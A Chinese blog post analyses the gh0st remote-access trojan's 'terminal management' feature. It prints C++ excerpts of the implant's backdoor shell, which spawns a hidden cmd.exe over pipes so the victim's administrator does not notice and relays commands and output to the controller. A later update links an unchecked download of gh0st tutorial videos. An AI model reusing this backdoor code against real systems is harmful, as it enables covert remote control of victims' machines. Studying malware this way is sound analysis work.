gh0st源码分析与远控的编写(三)

好久不见。距离上次写gh0st来有好久了,一是期末考试,忙不开,二是后来电脑坏了,几天没能上网。

昨天总算是把电脑修好了,虽说没到一切重头开始的地步,但是也重装各种东西花了很久。闲下来的时间,我就来继续分析gh0st的源码吧。

上次我们把gh0st的上线给研究了一下,跟着老狼的视频,继续我们的步伐。开始实现gh0st中具体的功能。最简单的一个是“终端管理”,就是一个cmdshell。

什么是cmdshell,相当于是一个cmd命令行的后门,我在主控端中写下cmd命令,然后传给被控端,被控端执行后将结果再发给主控端。

这是整个远控中比较简单的部分,我们从被控端开始看起(源码在附件中可以下载)。

在MainDll工程中,打开类视图,找到CShellManager这个类,这就是我们“终端管理”功能用到的类。

在看代码之前,我先说一下cmdshell的原理。为什么我们这个程序能执行cmd命令并且把执行结果得到并返回。这里用到管道技术,管道是为了进程间通信而存在的,如下图:

03.jpg

我们在gh0st进程中,开启一个cmd进程,并使用管道,向cmd.exe传送信息,而cmd.exe也利用管道将信息发送给gh0st的进程。管道通信又分三种,双管道、单管道与无管道。gh0st里面用的双管道后门,也就是说,我们在gh0st.exe和cmd.exe之间建立了两根传输数据的管道,原因可想而知:a管道接受gh0st的命令,并发送给cmd,b管道接受cmd的执行结果,并发送给gh0st。

理解了这个就方便了。首先看到它的构造函数:

    if (!CreatePipe(&m_hReadPipeShell, &m_hWritePipeDll, &sa, 0)) //该管道为程序写,cmd读
    {
        CloseHandle(m_hReadPipeShell);
        CloseHandle(m_hWritePipeDll);
        return ;
    }

    if (!CreatePipe(&m_hReadPipeDll, &m_hWritePipeShell, &sa, 0)) //该管道为cmd写,程序读
    {
        CloseHandle(m_hReadPipeDll);
        CloseHandle(m_hWritePipeShell);
    }

创建了两根管道,使用的API就是CreatePipe,m_hReadPipeShell其实就是一个句柄。CreatePipe这个API前两个参数是该管道的读句柄和写句柄。读句柄就是该管道的入口,写句柄就是该管道的出口。管道这个名字很恰当,就像一根管子,数据从一个方向流入,从另一个方向流出。

sa是安全属性的一个结构,没有太大作用,初始化一下传入地址进去就行了。

再往下看,

    //获得当前程序的相关信息
    GetStartupInfo(&si);
    si.cb = sizeof(STARTUPINFO);
    si.wShowWindow = SW_HIDE;  //将进程属性设置为隐藏,否则cmd一打开管理员就看到了
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput = m_hReadPipeShell; //将cmd读、写句柄赋值给该参数
    si.hStdOutput = m_hWritePipeShell;
    si.hStdError = m_hWritePipeShell;

    GetSystemDirectoryA(szShellPath, MAX_PATH);
    strcat_s(szShellPath, MAX_PATH, "\\cmd.exe");

    if (!CreateProcess(szShellPath, NULL, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi))
    {
        CloseHandle(m_hReadPipeDll);
        CloseHandle(m_hWritePipeDll);
        CloseHandle(m_hReadPipeShell);
        CloseHandle(m_hWritePipeShell);
        return;
    }

这部分实际上是在创建一个进程。创建cmd进程,使用的函数是CreateProccess,在创建进程之前,首先要设置一下该进程的属性(使用到STARTUPINFO结构,)。GetStartupInfo(&si)就是获取本进程的属性。相当于用本进程的属性初始化了cmd进程的属性,然后再改一改,看看注释就知道了。

到此,创建了一个进程(cmd.exe)和两根管道了。然后我们可以看到,被控端执行了这一条命令:Send((LPBYTE)&bToken, 1); 发送了这个参数:TOKEN_SHELL_START给主控端。这就告诉主控端,一切就绪,可以开始使用了。

之后打开两个线程,一个是读取管道数据,一个是等待管道关闭。

看到读取管道数据的线程,主要内容是一个死循环:

    while (true)
    {
        Sleep(100);
        while (PeekNamedPipe(pThis->m_hReadPipeDll, ReadBuffer, sizeof(ReadBuffer), 
            &ByteRead, &TotalByteAvail, NULL))
        {
            if (ByteRead <= 0)
            {
                break;
            }
            ZeroMemory(&ByteRead, sizeof(ByteRead));
            LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, TotalByteAvail); //LocalAlloc函数从堆中分配指定大小的区域
            //读取管道内信息
            ReadFile(pThis->m_hReadPipeDll, lpBuffer, TotalByteAvail, &ByteRead, NULL);
            //发送数据
            pThis->Send(lpBuffer, TotalByteAvail);
            LocalFree(lpBuffer);
        }
    }

其中用到PeekNamedPipe这个API,它的作用就是向管道中看一眼,如果有数据则返回True,如果没有则返回FALSE。也就是说,如果没有数据,这个线程就一直在外部那个循环中,不停sleep。直到有数据就进入内部循环。ByteRead是数据的大小,如果它为0则表示cmd.exe已经关闭了,就break然后退到外层循环,再一直sleep。如果有内容我们就使用ReadFile读取管道中内容,并Send到主控端去。

说到这里,有些人就要问了。你只说了怎么从管道里读取内容发送给主控端,但我们被控端怎么从主控端接收内容并发送给管道呢?

上节课最后我们说了,“OnReceive函数在CManager中定义,但并未实现”。我们在这个文件中搜索一个OnRecieve,发现了它的实现:

void CShellManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
    if (nSize == 1 && lpBuffer[0] == COMMAND_NEXT)
    {
        NotifyDialogIsOpen();
        return ;
    }

    //将客户端发来的信息传入管道中
    unsigned long ByteWrite;
    WriteFile(m_hWritePipeDll, lpBuffer, nSize, &ByteWrite, NULL);
}

这就是面向对象的思想。我们所有的CXXXManager其实都是继承的CManeger,而CManager中有这个函数,不过是一个虚函数,没有具体代码。而在我们每个的CXXXManager具体类中,就将其实现。

我们看看其代码。实际上是判断传进来的消息,如果是COMMAND_NEXT,说明主控端执行完毕,被控端执行下一步。如果不是COMMAND_NEXT,说明发送来的信息是数据(命令)。我们就将发来的信息传入管道。

被控端大致就是这些,我们再看主控端。主控端的一些界面的代码我就不讲了,大家有兴趣可以自己看看。

04.jpg

主控端是这样一个思路。首先,用户点击“终端管理”的按钮,然后主控端向被控端发送一条消息,告诉被控端开始终端管理工作,然后被控端新建一个CShellManager类,在类的构造函数里创建两个管道和一个cmd进程。并在最后发送一个TOKEN_SHELL_START命令给主控端(还记得吗?),主控端接受到此命令后,便建立一个CShellDlg类,并打开相应对话框。

在类视图中找到CShellDlg这个类,这就是我们的远程管理窗口的类。我们看到其构造函数中发送了一个COMMAND_NEXT给被控端,还记得我们刚才看的OnReceive函数吗,那个if语句就是处理这个消息。就是告诉被控端,一切就绪。

我们再打开CPhRemoteDlg类,找到其中的ProccessReceiveComplete函数,其中有一段:

        case SHELL_DLG:
            ((CShellDlg *)dlg)->OnReceiveComplete();
            break;

就是调用了CShellDlg类中的OnRecieveComplete方法,意思就是接收到信息就调用这个方法。

找到这个方法,实际上就是将从socket接受的信息放入编辑框。

再看到PreTranslateMessage方法,它截获一些消息,包括了按键的消息。注释写的很详细,其实就是,当用户按下回车时,将编辑框中所有文本都保存在字符串中,并减去上一次的长度,得到用户新输入的长内容,作为命令,发送出去。

其实主体内容就这么多,所以说cmdshell是gh0st中比较简单的部分了。大家看了这篇文章,大概就知道gh0st源码的一个运行过程了。其他的功能其实发送信息的过程也类似,互相确认一下执行是否成功,并开始发送、接收信息。


2021年update:

时间过去了多年,当时的更新没坚持下去,现在gh0st已经过时很久了,所以一直没有再管这几篇文章。没想到这几年还是有不少人会来看,也多次找我要过老狼的gh0st视频教程。我翻了下很久以前的硬盘,虽然没找到当初的原版,还是找到了一个版本,也许能够满足大家的需求(需要翻墙下载):https://mega.nz/folder/IdpBCQyL#wWMLeOD9eG09KduQywqJQA

相关源码可以在Github找到。

如果压缩包有密码,密码是www.hegouvip.com。由于视频是exe格式,我没有检查过,自己谨慎。

赞赏

喜欢这篇文章?打赏1元

评论

虎牙独魂 回复

楼主 可以发一下 源码下载吗 Gh0st远控的源码

荷兰bowl 回复

读取管道数据的线程中
ZeroMemory(&ByteRead, sizeof(ByteRead));
这一句不对吧?

s0f 回复

支持博主 继续写下去,文章写的不错!

phithon 回复

@s0f:真心感谢!

毛猴 回复

接着写啊

phithon 回复

@毛猴:是,会的,近期会放下手里的事继续写gh0st

czBen 回复

楼主文章写的不错啊, 最近我也在看gh0st的源码。

captcha